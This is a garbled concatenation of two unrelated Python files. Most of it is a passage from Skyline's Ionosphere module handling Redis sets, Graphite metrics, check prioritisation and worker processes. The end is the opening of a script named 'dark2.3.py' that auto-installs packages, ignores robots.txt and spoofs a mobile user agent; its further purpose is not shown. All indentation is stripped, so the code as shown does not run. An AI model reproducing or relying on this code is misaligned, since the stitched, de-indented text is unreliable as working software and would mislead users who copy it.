not_anomalous = str(len(list(self.redis_conn_decoded.smembers('ionosphere.not_anomalous'))))
except:
not_anomalous = '0'
logger.info('not_anomalous :: %s' % not_anomalous)
send_metric_name = '%s.not_anomalous' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, not_anomalous)
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis set instead of Manager() list
# total_anomalies = str(len(self.anomalous_metrics))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# total_anomalies = str(len(list(self.redis_conn.smembers('ionosphere.anomalous_metrics'))))
total_anomalies = str(len(list(self.redis_conn_decoded.smembers('ionosphere.anomalous_metrics'))))
except:
total_anomalies = '0'
logger.info('total_anomalies :: %s' % total_anomalies)
send_metric_name = '%s.total_anomalies' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, total_anomalies)
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# training_metrics = str(len(self.training_metrics))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# training_metrics = str(len(list(self.redis_conn.smembers('ionosphere.training_metrics'))))
training_metrics = str(len(list(self.redis_conn_decoded.smembers('ionosphere.training_metrics'))))
except:
training_metrics = '0'
logger.info('training metrics :: %s' % training_metrics)
send_metric_name = '%s.training_metrics' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, training_metrics)
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# features_profiles_checked = str(len(self.features_profiles_checked))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# features_profiles_checked = str(len(list(self.redis_conn.smembers('ionosphere.features_profiles_checked'))))
features_profiles_checked = str(len(list(self.redis_conn_decoded.smembers('ionosphere.features_profiles_checked'))))
except:
features_profiles_checked = '0'
logger.info('fps checked count :: %s' % features_profiles_checked)
send_metric_name = '%s.fps_checked' % skyline_app_graphite_namespace
# @modified 20170306 - Feature #1960: ionosphere_layers
# Corrected namespace
# send_graphite_metric(skyline_app, send_metric_name, not_anomalous)
send_graphite_metric(skyline_app, send_metric_name, features_profiles_checked)
# @added 20170306 - Feature #1960: ionosphere_layers
try:
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked = str(len(self.layers_checked))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# str_layers_checked = str(len(self.layers_checked))
str_layers_checked = str(len(list(self.redis_conn.smembers('ionosphere.layers_checked'))))
except:
str_layers_checked = '0'
logger.info('layers checked count :: %s' % str_layers_checked)
send_metric_name = '%s.layers_checked' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str_layers_checked)
if settings.PANORAMA_ENABLED:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# sent_to_panorama = str(len(self.sent_to_panorama))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# sent_to_panorama = str(len(list(self.redis_conn.smembers('ionosphere.sent_to_panorama'))))
sent_to_panorama = str(len(list(self.redis_conn_decoded.smembers('ionosphere.sent_to_panorama'))))
except:
sent_to_panorama = '0'
logger.info('sent_to_panorama :: %s' % sent_to_panorama)
send_metric_name = '%s.sent_to_panorama' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, sent_to_panorama)
sent_graphite_metrics_now = int(time())
try:
self.redis_conn.setex(cache_key, 59, sent_graphite_metrics_now)
logger.info('updated Redis key - %s' % cache_key)
except:
logger.error('error :: failed to update Redis key - %s up' % cache_key)
# Reset lists
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# self.anomalous_metrics[:] = []
# self.not_anomalous[:] = []
# self.features_profiles_checked[:] = []
# self.training_metrics[:] = []
# self.sent_to_panorama[:] = []
# @added 20170306 - Feature #1960: ionosphere_layers
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# self.layers_checked[:] = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
delete_redis_sets = [
'ionosphere.anomalous_metrics',
'ionosphere.not_anomalous',
'ionosphere.features_profiles_checked',
'ionosphere.training_metrics',
'ionosphere.sent_to_panorama',
'ionosphere.layers_checked',
]
for i_redis_set in delete_redis_sets:
redis_set_to_delete = i_redis_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
ionosphere_job = False
learn_job = False
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
# Do not run checks if the namespace is a declared SKYLINE_FEEDBACK_NAMESPACES
# namespace that has been checked in the last 10 minutes if
# there are multiple checks to do.
rate_limit_feedback_metrics = False
if metric_var_files:
metric_var_files_sorted = sorted(metric_var_files)
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, str(metric_var_files_sorted[0]))
metric_var_files_count = len(metric_var_files_sorted)
if metric_var_files_count > 2:
rate_limit_feedback_metrics = True
logger.info('rate_limit_feedback_metrics set to %s' % (str(rate_limit_feedback_metrics)))
if rate_limit_feedback_metrics:
for i_metric_check_file in metric_var_files_sorted:
feedback_metric = False
check_metric_file_list = i_metric_check_file.split('.', -1)[1:]
last_name_element = len(check_metric_file_list) - 1
base_name = '.'.join(check_metric_file_list[0:last_name_element])
metric_namespace_elements = base_name.split('.')
for to_skip in SKYLINE_FEEDBACK_NAMESPACES:
if to_skip in base_name:
feedback_metric = True
logger.info('SKYLINE_FEEDBACK_NAMESPACES matched on to_skip %s in base_name %s' % (to_skip, base_name))
break
to_skip_namespace_elements = to_skip.split('.')
elements_matched = set(metric_namespace_elements) & set(to_skip_namespace_elements)
if len(elements_matched) == len(to_skip_namespace_elements):
feedback_metric = True
logger.info('SKYLINE_FEEDBACK_NAMESPACES matched elements in %s' % base_name)
break
if feedback_metric:
remove_feedback_metric_check = False
if metric_var_files_count > 4:
logger.info('rate limiting feedback metric, removing check for %s as Ionosphere has %s pending checks, not checking feedback metric' % (
base_name, str(metric_var_files_count)))
remove_feedback_metric_check = True
cache_key = 'ionosphere.feedback_metric.checked.%s' % (base_name)
check_done = False
try:
check_done = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not check_done:
logger.info('not removing feedback metric as no check has been done in last 600 seconds on %s' % base_name)
else:
logger.info('rate limiting feedback metric, removing check as %s has been checked in the last 600 seconds' % (
base_name))
remove_feedback_metric_check = True
if remove_feedback_metric_check:
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, i_metric_check_file)
self.remove_metric_check_file(str(metric_check_file))
# @added 20200907 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp]
redis_set = 'analyzer.waterfall_alerts.sent_to_ionosphere'
metric_check_file_timestamp = i_metric_check_file.split('.', -1)[0]
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == int(metric_check_file_timestamp):
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed feedback metric waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove feedback metric waterfall alert item for %s from Redis set %s' % (
base_name, redis_set))
redis_set = 'mirage.waterfall_alerts.sent_to_ionosphere'
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == int(metric_check_file_timestamp):
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed feedback metric waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove feedback metric waterfall alert item for %s from Redis set %s' % (
base_name, redis_set))
# Determine metric_var_files after possible feedback metric removals
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20200414 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Prioritise realtime metric checks over analyzer_batch checks
# as if a lot of anomalies are submitted from analyzer_batch
# and they are processed first then real time metrics waiting to
# be processed could the max_age_seconds time limit. Batch
# anomalies are not submitted to max_age_seconds check,
# therefore they will get done in due course.
prioritise_realtime_checks = True
remove_batch_anomalies_check_files = []
realtime_metric_var_files_count = 0
batch_metric_var_files_count = 0
# If there are realtime metric anomalies and batch metric
# anomalies prioritise the realtime checks by removing the
# batch anomaly checks from the metric_var_files
if metric_var_files and prioritise_realtime_checks and BATCH_PROCESSING:
if rate_limit_feedback_metrics:
prioritise_realtime_checks = False
logger.info('prioritise_realtime_checks set to %s' % (str(prioritise_realtime_checks)))
try:
metric_var_files_sorted = []
if metric_var_files:
metric_var_files_sorted = sorted(metric_var_files)
# logger.info('prioritise_realtime_checks checking %s metrics for batch anomalies' % (str(len(metric_var_files_sorted))))
for i_metric_check_file in metric_var_files_sorted:
analyzer_batch_anomaly = None
check_file_anomaly_timestamp = None
try:
check_metric_file_list = i_metric_check_file.split('.', -1)[1:]
last_name_element = len(check_metric_file_list) - 1
base_name = '.'.join(check_metric_file_list[0:last_name_element])
i_metric_check_filename = i_metric_check_file.replace(settings.IONOSPHERE_CHECK_PATH + '/', '')
check_file_anomaly_timestamp = i_metric_check_filename.split('.', 1)[0]
except Exception as e:
logger.error('error :: could not determine anomaly_timestamp from filename %s - %s' % (
i_metric_check_file, str(e)))
check_file_anomaly_timestamp = None
# Is this a analyzer_batch related anomaly
if check_file_anomaly_timestamp:
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(check_file_anomaly_timestamp), base_name)
try:
analyzer_batch_anomaly = self.redis_conn.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('batch processing - identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
remove_batch_anomalies_check_files.append(i_metric_check_file)
batch_metric_var_files_count += 1
else:
realtime_metric_var_files_count += 1
# logger.info('batch processing - no batch anomaly Redis key found - %s' % analyzer_batch_metric_anomaly_key)
# @added 20200414 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# If there are realtime metric anomalies and batch metric
# anomalies prioritise the realtime checks by removing the
# batch anomaly checks from the metric_var_files
realtime_metric_var_files = []
if realtime_metric_var_files_count > 0:
if remove_batch_anomalies_check_files:
for metric_var_file in metric_var_files_sorted:
if metric_var_file in remove_batch_anomalies_check_files:
logger.info('removing batch anomaly check file to prioritise realtime metric checks - %s' % str(metric_var_file))
else:
realtime_metric_var_files.append(metric_var_file)
if realtime_metric_var_files:
realtime_metric_var_files_count = len(realtime_metric_var_files)
metric_var_files = realtime_metric_var_files
logger.info('removed %s batch anomaly check files from metric_var_files list to prioritise the %s realtime metric checks' % (
str(batch_metric_var_files_count),
str(realtime_metric_var_files_count)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine batch anomalies')
if metric_var_files:
ionosphere_job = True
logger.info('%s metric check files, so set to ionosphere_job = True' % (str(len(metric_var_files))))
break
# @added 20170113 - Feature #1854: Ionosphere learn
# Added the learn variable to spawn a spawn_learn_process when
# required.
work_queue_items = 0
if settings.IONOSPHERE_LEARN:
learn_work = None
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# learn_work = self.redis_conn.smembers('ionosphere.learn.work')
learn_work = self.redis_conn_decoded.smembers('ionosphere.learn.work')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.learn.work - %s' % e)
if learn_work:
work_queue_items = len(learn_work)
if work_queue_items > 0:
learn_job = True
if learn_job:
break
# @added 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Do not run an Ionosphere and echo checks on a metrics when a lot of
# checks are being done. Manage the Ionosphere load and increased
# runtime in general that Ionosphere echo has introduced, especially
# when Ionosphere is issued lots of checks, if lots of metrics suddenly
# become anomalous.
metric_var_files_count = 0
ionosphere_busy = False
if ionosphere_job:
metric_var_files_sorted = sorted(metric_var_files)
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, str(metric_var_files_sorted[0]))
# @added 20190403 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Added a count of the number of checks to be done
metric_var_files_count = len(metric_var_files)
# If there are more than 4 metric check files set Ionosphere to
# busy so that Ionosphere alternates between checking the normal
# Ionosphere Mirage features profiles and the Ionosphere echo
# features profiles on subsequent checks of a metric so that
# when Ionosphere is busy it is not checking both sets of
# features profiles on every run.
if metric_var_files_count > 4:
ionosphere_busy = True
# @added 20170108 - Feature #1830: Ionosphere alerts
# Adding lists of smtp_alerter_metrics and ionosphere_non_smtp_alerter_metrics
# Timed this takes 0.013319 seconds on 689 unique_metrics
unique_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
unique_metrics = list(self.redis_conn_decoded.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get the unique_metrics list from Redis')
unique_metrics = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# The Redis analyzer.smtp_alerter_metrics list is created here to
# replace the self.ionosphere_smtp_alerter_metrics Manager.list in the below
# section
ionosphere_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
ionosphere_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere_smtp_alerter_metrics Redis set')
ionosphere_smtp_alerter_metrics = []
redis_sets_to_rename = [
'ionosphere.ionosphere_smtp_alerter_metrics',
'ionosphere.ionosphere_non_smtp_alerter_metrics'
]
for current_redis_set in redis_sets_to_rename:
new_redis_set = '%s.old' % current_redis_set
try:
self.redis_conn.rename(current_redis_set, new_redis_set)
except Exception as e:
if str(e) == 'no such key':
logger.info('could not rename Redis set %s to %s: %s' % (
current_redis_set, new_redis_set, str(e)))
else:
logger.error('error :: could not rename Redis set %s to %s: %s' % (
current_redis_set, new_redis_set, str(e)))
for metric_name in unique_metrics:
# @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
# base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
for alert in settings.ALERTS:
pattern_match = False
if str(alert[1]) == 'smtp':
ALERT_MATCH_PATTERN = alert[0]
METRIC_PATTERN = base_name
pattern_match = False
try:
# Match by regex
alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
pattern_match = alert_match_pattern.match(METRIC_PATTERN)
if pattern_match:
pattern_match = True
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name not in self.ionosphere_smtp_alerter_metrics:
if base_name not in ionosphere_smtp_alerter_metrics:
# self.ionosphere_smtp_alerter_metrics.append(base_name)
redis_set = 'ionosphere.ionosphere_smtp_alerter_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
except:
pattern_match = False
if not pattern_match:
# Match by substring
if alert[0] in base_name:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name not in self.ionosphere_smtp_alerter_metrics:
# self.ionosphere_smtp_alerter_metrics.append(base_name)
if base_name not in ionosphere_smtp_alerter_metrics:
redis_set = 'ionosphere.ionosphere_smtp_alerter_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name not in self.ionosphere_smtp_alerter_metrics:
# if base_name not in self.ionosphere_smtp_alerter_metrics:
# self.ionosphere_non_smtp_alerter_metrics.append(base_name)
if base_name not in ionosphere_smtp_alerter_metrics:
redis_set = 'ionosphere.ionosphere_non_smtp_alerter_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# The Redis lists are used here to replace the self.ionosphere_
# Manager().list()
ionosphere_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
ionosphere_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere_smtp_alerter_metrics Redis set')
ionosphere_smtp_alerter_metrics = []
ionosphere_non_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_non_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
ionosphere_non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere_non_smtp_alerter_metrics Redis set')
ionosphere_non_smtp_alerter_metrics = []
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# logger.info('smtp_alerter_metrics :: %s' % str(len(self.ionosphere_smtp_alerter_metrics)))
# logger.info('ionosphere_non_smtp_alerter_metrics :: %s' % str(len(self.ionosphere_non_smtp_alerter_metrics)))
logger.info('smtp_alerter_metrics :: %s' % str(len(ionosphere_smtp_alerter_metrics)))
logger.info('ionosphere_non_smtp_alerter_metrics :: %s' % str(len(ionosphere_non_smtp_alerter_metrics)))
if ionosphere_job:
# @added 20190326 - Feature #2484
# First process ionosphere_echo to create any missing
try:
ionosphere_echo_enabled = settings.IONOSPHERE_ECHO_ENABLED
except:
ionosphere_echo_enabled = False
# @added 20190403 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# If there are more than 2 metric check files, do not run
# process_ionosphere_echo to create echo features profiles
run_process_ionosphere_echo = True
if metric_var_files_count > 2:
run_process_ionosphere_echo = False
logger.info(
'not running process_ionosphere_echo as there are %s metric check files to be checked' % (
str(metric_var_files_count)))
# @added 20190527 - Feature #2484: FULL_DURATION feature profiles
# Branch #3002: docker
# Only process if there is a ionosphere.unique_metrics Redis set
if run_process_ionosphere_echo:
ionosphere_unique_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
ionosphere_unique_metrics = self.redis_conn_decoded.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get Redis smembers ionosphere.unique_metrics')
ionosphere_unique_metrics = []
# @added 20190527 - Feature #2484: FULL_DURATION feature profiles
if not ionosphere_unique_metrics:
logger.info('there are metrics in the Redis ionosphere.unique_metrics set, skipping process_ionosphere_echo')
# If there are more than 4 metric check files set Ionosphere to
# busy so that Ionosphere alternates between checking the normal
# Ionosphere Mirage features profiles and the Ionosphere echo
# features profiles on subsequent checks of a metric so that
# when Ionosphere is busy it is not checking both sets of
# features profiles on every run.
if metric_var_files_count > 4:
ionosphere_busy = True
if ionosphere_echo_enabled and run_process_ionosphere_echo:
# Spawn a single process_ionosphere_echo process
function_name = 'process_ionosphere_echo'
pids = []
spawned_pids = []
pid_count = 0
now = time()
for i in range(1, IONOSPHERE_PROCESSES + 1):
try:
p = Process(target=self.process_ionosphere_echo, args=(i, metric_check_file))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count), str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# Self monitor the process and terminate if the
# process_ionosphere_echo has run for too long
try:
ionosphere_echo_max_fp_create_time = settings.IONOSPHERE_ECHO_MAX_FP_CREATE_TIME
except:
ionosphere_echo_max_fp_create_time = 55
p_starts = time()
while time() - p_starts <= ionosphere_echo_max_fp_create_time:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds' % (
str(IONOSPHERE_PROCESSES),
function_name, time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all %s processes' % function_name)
logger.info('processing - %s' % str(metric_var_files_sorted[0]))
function_name = 'spin_process'
# @added 20170109 - Feature #1854: Ionosphere learn
# Added the learn variable to spawn a spawn_learn_process when
# required.
# @added 20170112 - Feature #1854: Ionosphere learn - Redis ionosphere.learn.work namespace
# Ionosphere learn needs Redis works sets
# When a features profile is created there needs to be work added to a Redis
# set
# When a human makes a features profile, we want Ionosphere to make a
# use_full_duration_days features profile valid_learning_duration (e.g.
# 3361) later.
if learn_job:
logger.info('processing - learn work queue - %s' % str(work_queue_items))
function_name = 'spawn_learn_process'
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
now = time()
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# for i in range(1, settings.IONOSPHERE_PROCESSES + 1):
for i in range(1, IONOSPHERE_PROCESSES + 1):
if ionosphere_job:
try:
# @modified 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Added ionosphere_busy if there are queued checks
# to ensure that Ionosphere echo is rate limited if a
# lot of metrics become anomalous and that Ionosphere
# alternates between normal Mirage features profiles
# comparisons and Ionosphere echo features profiles
# during busy times.
# p = Process(target=self.spin_process, args=(i, metric_check_file))
p = Process(target=self.spin_process, args=(i, metric_check_file, ionosphere_busy))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count),
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# @added 20170113 - Feature #1854: Ionosphere learn - Redis ionosphere.learn.work namespace
if learn_job:
try:
p = Process(target=self.spawn_learn_process, args=(i, int(now)))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count),
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# Self monitor processes and terminate if any spin_process has run
# for to long
p_starts = time()
# @modified 20180621 - Feature #2404: Ionosphere - fluid approximation
# Increase run time to 55 seconds to allow for Min-Max scaling
# while time() - p_starts <= 20:
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Added ionosphere_echo which takes more time
# while time() - p_starts <= 55:
try:
ionosphere_max_runtime = settings.IONOSPHERE_MAX_RUNTIME
except:
ionosphere_max_runtime = 120
while time() - p_starts <= ionosphere_max_runtime:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds' % (
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(IONOSPHERE_PROCESSES),
function_name, time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all %s processes' % function_name)
if ionosphere_job:
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
for p in pids:
if p.is_alive():
# @modified 20191031 - Bug #3296: Ionosphere spawn_learn_process hanging on docker
# Branch #3002 - docker
# Use terminate not join for docker
# logger.info('stopping %s - %s' % (function_name, str(p.is_alive())))
# p.join()
logger.info('killing %s - %s' % (function_name, str(p.is_alive())))
p.terminate()
# @added 20170108 - Feature #1830: Ionosphere alerts
# Reset added lists of ionospehere_smtp_alerter_metrics and
# ionosphere_non_smtp_alerter_metrics
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.ionosphere_smtp_alerter_metrics[:] = []
# self.ionosphere_non_smtp_alerter_metrics[:] = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# delete_redis_sets = [
# 'ionosphere.ionosphere_smtp_alerter_metrics',
# 'ionosphere.ionosphere_non_smtp_alerter_metrics',
# ]
delete_redis_sets = [
'ionosphere.ionosphere_smtp_alerter_metrics.old',
'ionosphere.ionosphere_non_smtp_alerter_metrics.old',
]
for i_redis_set in delete_redis_sets:
redis_set_to_delete = i_redis_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
|
dark2.3.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
